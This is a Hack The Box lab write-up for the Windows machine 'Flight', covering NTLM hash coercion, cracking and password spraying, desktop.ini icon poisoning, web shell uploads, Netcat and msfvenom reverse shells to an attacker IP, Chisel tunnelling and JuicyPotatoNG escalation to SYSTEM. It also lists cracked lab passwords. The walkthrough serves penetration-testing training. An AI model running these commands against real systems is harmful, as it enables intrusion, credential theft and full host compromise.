Flight | Hack The Box Walkthrough | OSCP Style
Flight is a hard-rated Windows machine that does an excellent job of chaining together several real-world Active Directory attack…
Flight is a hard-rated Windows machine that does an excellent job of chaining together several real-world Active Directory attack primitives. There is no single “magic” exploit here. Instead, the box rewards methodical enumeration and the patient abuse of NTLM authentication coercion.
Reconnaissance
As always, we begin with a full TCP port scan to understand the attack surface:
nmap -p- --open -sS -sV -sC --min-rate 5000 -vvv -n 10.10.11.187 -oN result.txt

Virtual host discovery
A default-looking site on port 80 is a strong hint that additional virtual hosts may be served from the same IP. We fuzz the Host header to enumerate them, filtering out the default response length (154 lines) to reduce noise:
wfuzz -c -z file,subdomains-top1million-5000.txt -u "http://flight.htb/" -H "Host: FUZZ.flight.htb" --hl 154

A single hit stands out: school (HTTP 2). We add school.flight.htb to our hosts file and browse to the new Aviation School application.
Local DNS resolution
Because the application relies on name-based virtual hosting, we map the discovered hostname to the target IP in our /etc/hosts file so our browser and tooling resolve it correctly:

Initial Foothold
The Aviation School navigation uses a tell-tale URL structure: index.php?view=… . Whenever a view= , page= or file= parameter feeds the application, Local File Inclusion / path traversal belongs at the top of our test list. We try the canonical payload:
http://school.flight.htb/index.php?view=../../../../../../etc/hosts
The application responds with “Suspicious Activity Blocked! Incident will be reported.” input sanitisation is stripping or rejecting traversal sequences.



A blocked local read does not mean the parameter is safe. On Windows, PHP’s file functions happily accept UNC paths ( \host\share ). Instead of reading a local file, we point the parameter at a resource on our own attacker machine. When the server tries to open that SMB share it will authenticate to us over NTLM, leaking the NetNTLMv2 hash of the web service account.
First, we start Responder on the tunnel interface to catch the inbound authentication:
sudo responder -I tun0

We trigger the coercion by pointing view= at a non-existent share on our box:
http://school.flight.htb/index.php?view=//10.10.14.9/noexiste

Responder immediately captures a NetNTLMv2 hash for the user svc_apache.
We crack it with Hashcat mode 5600 (NetNTLMv2) and the rockyou wordlist:
hashcat -a 0 -m 5600 hash.txt /usr/share/wordlists/rockyou.txt -force

Lateral Movement
We confirm the credentials over SMB:
crackmapexec smb 10.10.11.187 -u 'svc_apache' -p 'S@Ss!K@*t13'

Then we enumerate shares and users, the two inputs that drive the next phase:
crackmapexec smb 10.10.11.187 -u 'svc_apache' -p 'S@Ss!K@*t13' --shares
crackmapexec smb 10.10.11.187 -u 'svc_apache' -p 'S@Ss!K@*t13' --users


Password reuse is a common AD misconfiguration. We spray the recovered password against every enumerated user:
crackmapexec smb 10.10.11.187 -u users.txt -p 'S@Ss!K@*t13' - continue-on-success
The spray reveals a second account sharing the same password: S.Moon.

crackmapexec smb 10.10.11.187 -u 'S.Moon' -p 'S@Ss!K@*t13' - shares

We browse the Users share and grab an existing desktop.ini as a reference:
smbclient -U 'S.Moon' //10.10.11.187/Users
smb> get desktop.ini


desktop.ini controls folder appearance in Explorer. If we set IconResource to a UNC path pointing at us, any user who simply browses the folder will have Windows fetch the icon, coercing their NTLM authentication to our box:
[.ShellClassInfo]
IconResource=\\10.10.14.9\crypto\

We stand up an Impacket SMB server to capture the authentication:
impacket-smbserver crypto . -smb2support

And upload the file into the writable share:
smbclient -U 'S.Moon' //10.10.11.187/Shared
smb> put desktop.ini

Shortly after, a privileged user browses the share and our SMB server captures a NetNTLMv2 hash for C.Bum.

hashcat -a 0 -m 5600 hash2.txt /usr/share/wordlists/rockyou.txt --force

Web Shell & Service-to-User Pivot
crackmapexec smb 10.10.11.187 -u 'C.Bum' -p 'Tikkycoll_431012284' --shares


The Web share maps to the web roots of both sites, so we can drop a web shell straight into a directory served by Apache/PHP:
smbclient -U 'C.Bum' //10.10.11.187/Web
smb> put webshell.php


Browsing to the uploaded shell gives command execution as the svc_apache service account. We use it to pull Netcat and fire a reverse shell:
curl hxxp://10.10.14.9/nc64[.]exe -O nc[.]exe
nc64[.]exe -e powershell 10.10.14.9 9292


![Staging nc64[.]exe on the target.](https://cdn.academiaspg.com/blog/flight-hack-the-box-walkthrough-oscp-style/1_ACu9PWAfidpRSqEJXNmzQQ.png)


The web shell only yields the service account. Because we cracked C.Bum’s password, we use RunasCs to spawn a process as that interactive user:
curl hxxp://10.10.14.9/RunasCs[.]exe -O RunasCs[.]exe .\RunasCs[.]exe C.Bum Tikkycoll_431012284 powershell -r 10.10.14.9:9090
![Staging RunasCs[.]exe.](https://cdn.academiaspg.com/blog/flight-hack-the-box-walkthrough-oscp-style/1_ewlvB4EezXQtnDaQuQ-SPA.png)

With a nc -nlvp 9090 listener ready, we receive a shell as C.Bum and read the user flag.


Internal Pivot: Hidden IIS Site via Chisel
Enumerating the filesystem as C.Bum, we find an inetpub directory, evidence of an IIS site separate from the two Apache sites. We confirm it listens only internally:
netstat -oa
dir


We set up a reverse port-forward with Chisel. Server on our machine:
chisel server --reverse --port 9999
Client on the compromised host, forwarding the target’s internal 8000 back to us:
curl hxxp://10.10.14.9/chisel[.]exe -O chisel[.]exe
.\chisel[.]exe client 10.10.14.9:9999 R:8000:127.0.0.1:8000
![Staging chisel[.]exe on the target.](https://cdn.academiaspg.com/blog/flight-hack-the-box-walkthrough-oscp-style/1_GSZca7IlZhnv5DJqqbrK-w.png)


Browsing http://127.0.0.1:8000 now renders the internal IIS application through the tunnel.


ASPX web shell on IIS
The internal site exposes a directory with write access. We confirm by uploading a harmless .txt file and seeing it served back. Knowing the server is IIS, we generate an ASPX reverse shell:


msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.9 LPORT=3730 -f aspx > shell.aspx

We place it in the writable directory and trigger it:
wget http://10.10.14.9/shell.aspx -O shell.aspx



Privilege Escalation
whoami /priv

SeImpersonatePrivilege is Enabled: the gateway to the “Potato” family of local privilege-escalation attacks that abuse Windows token impersonation to elevate a service account to SYSTEM.
We transfer JuicyPotatoNG and use it to launch a command as SYSTEM:
curl hxxp://10.10.14.9/JuicyPotatoNG[.]exe -O JuicyPotatoNG[.]exe
.\JuicyPotatoNG[.]exe -t * -p "C:\Windows\System32\cmd.exe" -i
![Staging JuicyPotatoNG[.]exe.](https://cdn.academiaspg.com/blog/flight-hack-the-box-walkthrough-oscp-style/1_zEu5-0hqYL_CWGebgUpNww.png)

We are now NT AUTHORITY\SYSTEM: full control of the host. The root flag is ours and the box is owned.

References
- Places to steal NTLM creds: HackTricks
- Chisel Port Forward: SevenLayers
- RunasCs: antonioCoco
- JuicyPotatoNG: antonioCoco
If you’re interested in following my upcoming articles on OT/ICS, certifications, HTB content, and Red Team experiences, I invite you to connect with me on LinkedIn or Instagram.